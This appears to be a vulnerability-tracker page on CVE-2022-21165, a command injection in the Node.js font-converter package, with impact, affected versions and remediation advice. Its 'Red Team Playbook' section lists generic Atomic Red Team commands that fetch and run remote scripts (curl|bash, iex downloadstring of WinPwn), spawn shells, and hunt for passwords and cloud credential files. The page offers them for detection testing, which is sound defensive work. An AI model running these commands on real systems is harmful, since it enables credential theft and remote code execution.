CVE-2022-21165
Overview
The vulnerability is an arbitrary command injection caused by inadequate input sanitization in the font-converter package. Specifically, user-controlled input is passed unsanitized into the Node.js child_process.exec() function, allowing execution of arbitrary system commands. This flaw affects all versions of the font-converter package, impacting the core command execution component responsible for processing font conversion requests.
Vulnerability Description
All versions of package font-converter are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the child_process.exec() function.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary commands on the host system with the privileges of the application process. This can lead to full system compromise, data theft, or service disruption. The vulnerability requires no user interaction and is exploitable over the network (AV:N/AC:L/PR:N/UI:N), resulting in high confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Users should upgrade the font-converter package to a version where input sanitization is implemented or apply patches provided by the maintainers. Refer to the advisory at https://security.snyk.io/vuln/SNYK-JS-FONTCONVERTER-2976194 for detailed remediation steps. Reviewing and modifying the code at index.js line 12 to properly sanitize or avoid passing unsanitized input to child_process.exec() is recommended to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the font-converter package arises from a critical flaw in input handling, specifically the lack of proper sanitization for user-supplied data that is subsequently passed to the child_process.exec() function. This oversight allows an attacker to inject arbitrary commands into the system, leading to potential unauthorized execution of commands with the privileges of the application. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a significant risk to systems utilizing this package. The affected versions include 1.0.0, 1.1.0, and 1.1.1, all of which are commonly used in Node.js environments, making the issue particularly widespread among developers leveraging this technology for font conversion tasks.
Attack vectors for this vulnerability are varied, but they primarily hinge on the ability of an attacker to manipulate input data that the application processes. For instance, if an application using the font-converter package accepts user-uploaded files or parameters without adequate validation, an attacker could craft a malicious input that includes shell commands. When the application processes this input, it could inadvertently execute the injected commands, leading to a complete compromise of the system. Scenarios could range from simple data exfiltration to more severe outcomes, such as the installation of malware or the complete takeover of the server hosting the application.
The real-world impact of this vulnerability can be profound, particularly for businesses that rely on the font-converter package for critical operations. The potential for unauthorized command execution can lead to data breaches, loss of sensitive information, and significant reputational damage. Furthermore, the financial implications of such an incident can be substantial, encompassing costs related to incident response, legal fees, and regulatory fines, especially if the breach involves personally identifiable information (PII) or other sensitive data. Organizations that fail to address this vulnerability may also face long-term trust issues with their customers and partners, further exacerbating the business risk.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to conduct a thorough inventory of all applications utilizing the font-converter package and assess their exposure to the vulnerability. Regular security audits and code reviews can help identify instances where user input is not being properly sanitized. Additionally, organizations should consider updating to a patched version of the font-converter package, if available, or exploring alternative solutions that do not exhibit this vulnerability. Employing web application firewalls (WAFs) and intrusion detection systems (IDS) can also provide an additional layer of security by monitoring for suspicious activities and blocking potential exploitation attempts.
In conclusion, the arbitrary command injection vulnerability in the font-converter package represents a significant threat to any organization using this software. The ease of exploitation combined with the potential for severe consequences necessitates immediate attention from cybersecurity professionals. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to detect and mitigate this vulnerability, thereby safeguarding their systems and data from malicious actors.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Font Converter Project | Font Converter | 1.0.0 |
cpe:2.3:a:font_converter_project:font_converter:1.0.0:*:*:*:*:node.js:*:*
|
|
|
Font Converter Project | Font Converter | 1.1.0 |
cpe:2.3:a:font_converter_project:font_converter:1.1.0:*:*:*:*:node.js:*:*
|
|
|
Font Converter Project | Font Converter | 1.1.1 |
cpe:2.3:a:font_converter_project:font_converter:1.1.1:*:*:*:*:node.js:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-21165 |
| security.snyk.io |
GitHub CVE
x_refsource_MISC
|
https://security.snyk.io/vuln/SNYK-JS-FONTCONVERTER-2976194 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/zgec/node-js-font-converter/blob/master/index.js%23L12 |